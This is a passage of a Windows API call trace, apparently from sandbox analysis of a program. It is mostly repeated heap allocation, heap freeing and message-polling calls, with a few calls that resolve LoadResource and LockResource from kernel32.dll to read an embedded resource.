[0119.653] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0119.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0119.653] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.653] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0119.653] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0119.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0119.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0119.653] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0119.653] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0119.653] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0119.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f98 [0119.653] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.653] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f98 | out: hHeap=0x12c0000) returned 1 [0119.653] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0119.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0119.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0119.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b58 [0119.654] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b58 | out: hHeap=0x12c0000) returned 1 [0119.654] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0119.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0119.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0119.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0119.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0119.654] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0119.654] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef790 [0119.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0119.655] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0119.655] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491818 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491818 | out: hHeap=0x12c0000) returned 1 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e98 [0119.655] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e98 | out: hHeap=0x12c0000) returned 1 [0119.655] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491858 | out: hHeap=0x12c0000) returned 1 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14588d8 [0119.655] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0119.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0119.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0119.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0119.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0119.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0119.657] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0119.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0119.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0119.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd958 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0119.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6e8 [0119.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0119.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6e8 | out: hHeap=0x12c0000) returned 1 [0119.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0119.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0119.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6d0 [0119.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0119.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd898 [0119.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0119.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0119.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0119.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.658] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0119.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0119.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0119.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LoadResource", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd) returned 0x14bd958 [0119.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LoadResource", cchWideChar=13, lpMultiByteStr=0x14bd958, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoadResource", lpUsedDefaultChar=0x0) returned 13 [0119.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0119.659] GetProcAddress (hModule=0x74650000, lpProcName="LoadResource") returned 0x746676f0 [0119.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0119.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff320 [0119.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6d0 [0119.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0119.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0119.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0119.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff320 | out: hHeap=0x12c0000) returned 1 [0119.659] LoadResource (hModule=0x0, hResInfo=0xfe7688) returned 0x101d784 [0119.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0119.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0119.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd9a0 [0119.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0119.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd760 [0119.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7f0 [0119.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef720 [0119.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0119.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd760 | out: hHeap=0x12c0000) returned 1 [0119.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0119.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd850 [0119.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0119.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0119.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0119.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0119.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0119.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd898 [0119.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0119.660] FreeLibrary (hLibModule=0x74650000) returned 1 [0119.660] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.660] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.660] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.660] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.660] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.661] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.661] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.661] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.661] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0119.661] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0119.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LockResource", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LockResource", cchWideChar=13, lpMultiByteStr=0x14bd550, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LockResource", lpUsedDefaultChar=0x0) returned 13 [0119.661] GetProcAddress (hModule=0x74650000, lpProcName="LockResource") returned 0x74667890 [0119.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3c0 [0119.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0119.661] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.661] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0119.661] LockResource (hResData=0x101d784) returned 0x101d784 [0119.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0119.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef790 [0119.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0119.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0119.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0119.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef720 [0119.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0119.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0119.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0119.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0119.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0119.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0119.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0119.662] FreeLibrary (hLibModule=0x74650000) returned 1 [0119.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff348 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff050 | out: hHeap=0x12c0000) returned 1 [0119.663] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0119.663] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0119.663] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.663] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.663] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 